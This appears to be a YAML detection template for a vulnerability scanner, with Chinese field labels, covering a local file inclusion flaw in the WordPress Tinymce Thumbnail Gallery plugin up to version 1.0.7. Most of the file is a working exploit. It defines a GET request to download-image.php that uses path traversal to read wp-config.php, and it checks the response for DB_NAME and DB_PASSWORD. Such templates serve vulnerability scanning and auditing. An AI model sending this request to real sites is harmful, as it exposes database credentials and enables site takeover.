product: WordPress
vName: Tinymce Thumbnail Gallery - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: Tinymce Thumbnail Gallery 1.0.7 and before are vulnerable to local file inclusion via download-image.php.
version: <=1.0.7
note: ''
search: { }
protocol: http
link: https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
    verify:
      logic: and
      check:
        - body:
            value:
              - DB_NAME
              - DB_PASSWORD
            logic: and
        - status: 200
